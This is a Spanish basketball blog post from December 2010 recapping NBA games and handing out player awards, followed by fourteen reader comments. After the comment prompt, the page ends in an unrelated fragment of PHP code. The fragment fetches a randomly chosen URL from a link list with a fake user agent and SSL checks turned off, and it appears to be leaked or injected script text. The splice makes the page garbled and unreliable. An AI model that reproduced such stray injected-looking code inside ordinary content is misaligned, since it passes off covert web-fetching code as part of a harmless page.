La Crónica (21/12/2010)

22 de December de 2010 por TheDeerHunter

Segundo partido de los remodelados Orlando Magic y segunda derrota (105-99). De nada sirvieron los 23 rebotes que capturó Howard y es que las nuevas incorporaciones andan perdidísimos. Entre Turkoglu, Richardson y Arenas se lucieron con un 7 de 30. Pésimo dato frente a unos Mavs que lo bordaron colectivamente con hasta 6 hombres en dobles figuras.

Los Lakers se pegaron un batacazo de campeonato frente a Milwaukee tras haber regresado de su última gira (98-79). Fueron yéndose paulatinamente del partido conforme iba avanzando hasta que en el último cuarto terminaron de hundirse y Kobe acabó desquiciado y expulsado por las protestas. Ante la ausencia de Jennings surgió Boykins como líder inesperado. Se trata de un jugador ideal para este tipo de situaciones desesperadas a pesar de que los entrenadores tiendan a olvidarse de él cuando todo funciona con normalidad.

En cambio los Bulls rozaron los 50 puntos de humillación frente unos Sixers bochornosos (76-121). 35% contra 65%, 18 pérdidas… los únicos que se enteraron un poco fueron Iguodala y Young. Los mejores por Chicago fueron Rose y Deng.

Y para terminar con la zona noble los Thunder no tuvieron problemas ante los 81 puntos de Charlotte (99-81). Gran partido de Durant.

Por último asistimos a un duelo increíble entre Monta Ellis y Beno Udrih que se llevó el primero. (117-109). DeMarcus Cousins registró un 3-13 que lastró el ataque de los Kings. Y los Grizzlies a pesar del partidazo de Marc se vieron sorprendidos por los Nets (101-94) en el mejor partido de Vujacic de los últimos 3 años.

PREMIOS

MVP: Monta Ellis ha anotado 36 puntos pero ha necesitado 29 lanzamientos. En cambio Kevin Durant ha anotado 32 en una fantástica serie de 8 de 13 y encima ha cogido 7 rebotes.

Rookie: Continúa de titular Xavier Henry en los Grizzlies. Ayer anotó 11 puntos pero su especialidad es otra.

Sorpresa: Con 34 puntos (11 de 18) y 7 rebotes, a Beno Udrih le salió anoche el partido de su vida.  En cambio, Earl Boykins ha jugado partidos mejores, pero a sus 34 años no vamos a pedirle más que esos 22 puntos en 26 minutos que se cascó anoche.

Decepción: Los Sixers en general. Y no hace falta decir nada más.

Esfuerzo en vano: Habrá que ver si los nuevos fichajes de los Magic evitan que veamos mucho a Dwight Howard por aquí. Sus 26 puntos y 23 rebotes de ayer se quedaron en nada ante el despiste general de sus compañeros.

Comenta

14 comentarios a esta entrada

  1. Busky23 dice:
    #1

    Mamma mía que descalabro en el Staples…se dejan llevar y cuando se dan cuentan se la clavan,los 33 pts de los amarillos en la segunda parte lo dicen todo,gran defensa de los Bucks (LEmontus hombre de poca fe…),y lentejita Txusma??,ese pequeño gran jugador…la que ha montao en el ultimo cuarto… Victoria de mérito (6bajas) de los cervatillos.
    Otro que debe estar desquiciao es Howard,parece que va a ser peor el remedio que la enfermedad,lo de Arenas es lamentable. Muy bien Dallas,a pesar del pequeño bajón de Nowitzki hay otros como Butler o Terry que han dado un paso adelante,gran plantilla,para RS.
    Definitivamente coloco en mi quiniela por delante de Orlando a Chicago.
    Este es el Durant que a mi me gusta,ultimo cuarto demoledor de los Thunder que les colocan como líderes de división.

      Citar

  2. Denise dice:
    #2

    De los nuevos fichajes de los Magic, al final va a resultar que el bueno va a ser Earl Clark….xD.
    Vaya repaso que le ha pegado los Bucks sin Jennings a los Lakers. No es normal que los angelinos reciban estos repasos en casa y ante un rival normalito como Bucks. Solo encuentro dos motivos para explicar este batacazo.
    1- Estaban pensando más en el partido vs Heat que contra los propios Bucks
    2- Tras una larga gira por el Este han llegado de nuevo a su ciudad y han estado entrenando en exceso la tercera pierna y han llegado reventados.

    Partidazos de Vujacic y Radmanovic. Que raro.

      Citar

  3. Busky23 dice:
    #3

    Después de las 2 técnicas seguidas hoy a Kobe,se atreverá Stern a sancionarlo teniendo en cuenta que el siguiente partido es contra los Heat????

      Citar

  4. CAMPO2 dice:
    #4

    Por lo que dicen por ahi se esta preparando un megatraspaso entre varios equipos que daría con Melo en los Nets.

      Citar

  5. scriers dice:
    #5

    Yo ayer vi Orlando – Dallas. Qué buena pinta tiene Dallas, y quede variantes en ataque. Casi que hubo momentos que no se acordaban de Nowitzki. Han conseguido alternativas y variantes. A mi Kidd me pareció excelente entendiendo el juego, aunque luego su labor anotadora no brille tanto. Luego Chandler y Butler como secundarios son brutales.
    Por contra Orlando me pareció una banda con talento y buenas individualidades. Es el mayor reto de Van Gundy, encontrar que esta gente parezca un equipo y no se descalabre, que los egos funcionen.

    También vi un rato a Oklahoma ganar a Bobcats. Sinceramente, por muy poco que anoten Bobcats, si te has decidio por unos jugadores otórgales confianza. Mejores ya no tienen, solo peores, así que buscas un traspaso o algo, pero no confundas a todo dios. Lo que no entiendo es que jueguen 12 o 13 tíos en un mismo partido. Es que no tiene sentido una rotación así, y además, tan desordenada, con un desequilibro brutal. Brown, que coño estás haciendo. Ah, y Durant empezó muy mal pero luego fue muy muy lider.
    Los demás partido nos lo vi, pero vaya batacazo de Lakers.

      Citar

  6. -=TheKing=- dice:
    #6

    Pensamiento interior, Dallas y Heat etan al mejor nivel de equipo NBA que pueden estar y mejorando.

    Realidad factible, en PlayOff, los que cortan el bacalao son San Antonio, Celtics y Lakers.

      Citar

  7. Denise dice:
    #7

    Yo no descartaría tan pronto a Orlando, lo que si creo es que este equipo va a pecar de irregularidad.
    Me explico, en estos tres ultimos años, los Magic han sido bastante regulares, ganando los partidos que tenían que ganar (ante rivales inferiores) y perdiendo los partidos en los cuales ellos no eran los favoritos.
    Ahora, creo que van a ser capaces de lo mejor y de lo peor, por poner un ejemplo, lo mismo ganan de 30 en el Boston Garden y al partido siguiente pierden de 15 en casa contra los Bobcats

      Citar

  8. Viva_Dirk dice:
    #8

    La clave para Orlando será Arenas, si es un jugador centrado y sano es sin duda una estrella de la liga, un jugador capaz de liderar la anotación del equipo y aportar liderazgo, lo que unido a Howard les colocaría para mi a la altura de Miami, Boston es otro cantar de momento para lo que les haría falta mas tiempo. De Richardson y Turkoglu mas o menos saben lo que pueden esperar, y es mejor que lo que han soltado por ellos.

    Y veremos el papel de Nelson si Arenas se pone a tono, igual tampoco acaba la temporada en los Magics.

      Citar

  9. Denise dice:
    #9

    Para mi Nelson, Howard y Bass son imprescindibles en el equipo. Un trade por ellos no lo entendería.

      Citar

  10. Txusma dice:
    #10

    El traspaso de Carmelo está que arde. La opción más clara parecen los Nets, pero los Knicks siguen al acecho y ultimamente suenan Rockets y, ojo, Mavs!

      Citar

  11. Ru dice:
    #11

    Yo no descartaría a Mavs de cara a los PO ya que con hombres como Terry,Stevenson,Barea o Marion pueden administrarse muy bien los minutos para llegar con bastantes fuerzas a la postemporada.No deben desfondarse por ser el líder de la RS,al fin y al cabo tampoco es tan importante -lo mismo para Spurs-.

    El traspaso Wizards-Suns-Magic lo veo muy bien por los dos primeros.Lo de Wizards hay que analizarlo en el sentido de que liberan a Wall de cualquier distracción,él es el jugador franquicia,sobre él se reconstruyen los nuevos Wizards.Confiando en la progresión de Blatche,McGee y N.Young como jugadores jóvenes,yo usaría a Lewis de 3 con Josh Howard de 6º hombre para el SG/SF,traspasando a Al Thornton por un interior suplente,sobre todo en el C,que es lo más débil de Washington. Los Suns ganan defensa con Pietrus y Gortat,con Carter que puede cumplir el rol de J-Rich y sobre todo,es expiring(no tengo ninguna duda que Phoenix no ejercerá su TO).Y la incógnita Magic…bien J-Rich,a saber el papel qué hará un Turkoglu que la cago marchándose de Florida y la dupla Arenas-Nelson me chirria y por alguno de los dos deberían cortar,sobre todo,para buscar un interior de garantías que pueda jugar de 4-5.Seria injusto que traspasaran a Nelson pero sería lo más fácil sinceramente,dudo que por Arenas consigan algo.

    Lo de Melo a los Nets…no lo veo,equipo perdedor aunque es lo que más suena y parece que puede hacerse.Knick lo dije en otra entrada,no lo veo necesario para NYK con Chandler y Gallinari y la prioridad debería ser CP3.

      Citar

  12. Tobal dice:
    #12

    Anoche vi el partido de Orlando-Dallas,los Mavericks me gustaron mucho,jugando con sentido y en equipo,con varios jugadores anotando en dobles dígitos,tienen muy buena pinta,aunque queda mucha temporada.

      Citar

  13. GreenPride dice:
    #13

    Vi Orlando-Dallas. Dallas muy bien, jugando con mucho espacio en ataque y ametrallando desde el triple. Tienen muchos jugadores de calidad en ataque pero ¿Tienen lo que hay que tener para los playoffs o les pasara lo de los ultimos años? Esa es la gran pregunta. En cuanto a Orlando, plantaron cara a un equipo enrachado con muchos jugadores nuevos. Turkoglu empieza a entrar en el equipo pero Richardson y Arenas todavía no se enteran de nada, habrá que darles un poco de tiempo. El gran problema que tuvieron y que sí debe preocupar es que teniendo a Howard los Mavs se hincharon a hacer mates (Chandler hizo 6 mates y Haywood otros 2), con una defensa interior tan floja les será muy complicado ganar a los grandes

      Citar

  14. aro_pasado_no_newtoniano dice:
    #14

    Canastón de de Radmanovic.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>